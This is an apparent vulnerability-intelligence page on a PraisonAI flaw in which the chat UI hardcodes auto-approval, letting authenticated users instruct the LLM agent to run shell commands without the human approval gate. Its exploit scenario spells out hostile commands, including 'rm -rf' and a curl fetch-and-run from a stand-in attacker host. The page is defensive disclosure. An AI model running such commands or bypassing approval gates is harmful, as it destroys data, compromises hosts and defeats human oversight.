Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
UI is network-reachable HTTP with low complexity; requires an authenticated UI account (PR:L); no user interaction; full RCE on host yields high C/I/A with unchanged scope.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
PraisonAI before 4.5.128 contains an arbitrary shell command execution vulnerability where the UI modules hardcode approval_mode to auto, overriding administrator configuration from PRAISON_APPROVAL_MODE environment variable. Authenticated attackers can instruct the LLM agent to execute arbitrary shell commands via subprocess.run with shell=True, bypassing the manual approval gate and insufficient command sanitization blocklists.
AnalysisAI
Arbitrary shell command execution in PraisonAI before 4.5.128 allows authenticated UI users to bypass the human-in-the-loop approval gate because the Chainlit chat and code UI modules hardcode approval_mode='auto' after loading administrator config from PRAISON_APPROVAL_MODE. Once auto-approved, prompts to the LLM agent reach subprocess.run with shell=True, and the existing blocklists only filter command chaining operators - leaving single destructive commands (rm -rf, curl, dd, chmod) executable. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires a reachable PraisonAI Chainlit web UI started via 'praisonai ui chat' or 'praisonai ui code' (the underlying agent_tools/action_orchestrator code paths used from the CLI or SDK are not affected by the hardcoded override) and valid authenticated UI credentials (PR:L) - the GHSA PoC notes default credentials as a starting condition. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Authoritative signals weigh moderately high: CVSS 4.0 base 8.7 (AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H) reflects network-reachable, low-complexity, low-privilege RCE on the host running the UI. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker who obtains or already holds credentials to a PraisonAI Chainlit UI (e.g., a default-credential or internally exposed instance) opens a chat session and instructs the agent in natural language to 'run rm -rf /home/praison' or 'fetch and run a payload with curl http://attacker.example/p.sh -o /tmp/p && /bin/sh /tmp/p' - the latter chained form is blocked, but the single-argument curl, wget, dd, or chmod variants pass both sanitizers. Because approval_mode is hardcoded to 'auto', the orchestrator approves the plan with no human prompt and subprocess.run executes it as the PraisonAI server process user, giving the attacker RCE on the host. … |
| Remediation | Vendor-released patch: upgrade praisonai to 4.5.128 or later (pip install --upgrade praisonai), which restores honoring of the PRAISON_APPROVAL_MODE environment variable in the Chainlit UI modules; see GHSA-qwgj-rrpj-75xm. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Immediately inventory all PraisonAI deployments and document versions; restrict UI access to authorized administrators only; disable or isolate affected systems if running version before 4.5.128. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Remote code execution in PraisonAI before 1.6.78 allows attackers to run arbitrary Python on the host by manipulating th
Root-level command execution and arbitrary file write in PraisonAI's AICoder component (all versions before 4.6.78) let
Path traversal in PraisonAI multi-agent teams system (versions prior to 4.5.128) enables arbitrary file overwrite throug
Remote code execution in PraisonAI before 4.6.78 lets an attacker who can supply the agents_file parameter to deploy/api
SQL/CQL injection in PraisonAI's PGVector and Cassandra knowledge-store backends before 4.6.78 allows a caller who contr
PraisonAI AgentOS prior to version 4.5.128 exposes agent metadata including names, roles, and system instruction snippet
Remote code execution in PraisonAI multi-agent framework (versions prior to 4.5.128) allows unauthenticated attackers to
Unauthenticated remote session hijacking in PraisonAI's browser bridge (versions <4.5.139) and praisonaiagents (<1.5.140
Unauthenticated agent access in PraisonAI before 1.7.3 lets remote attackers read agent instructions and system prompts
Webhook signature-verification bypass in PraisonAI before 4.6.78 lets unauthenticated attackers forge Svix 'message.rece
Authentication bypass in PraisonAI before 4.6.78 lets a remote, unauthenticated attacker reach the Call API agent-invoca
System prompt extraction and unauthorized tool invocation in PraisonAI before 4.6.78 arise because the prompt-injection
Same weakness CWE-863 – Incorrect Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37959
GHSA-gx4r-3wg8-9w5x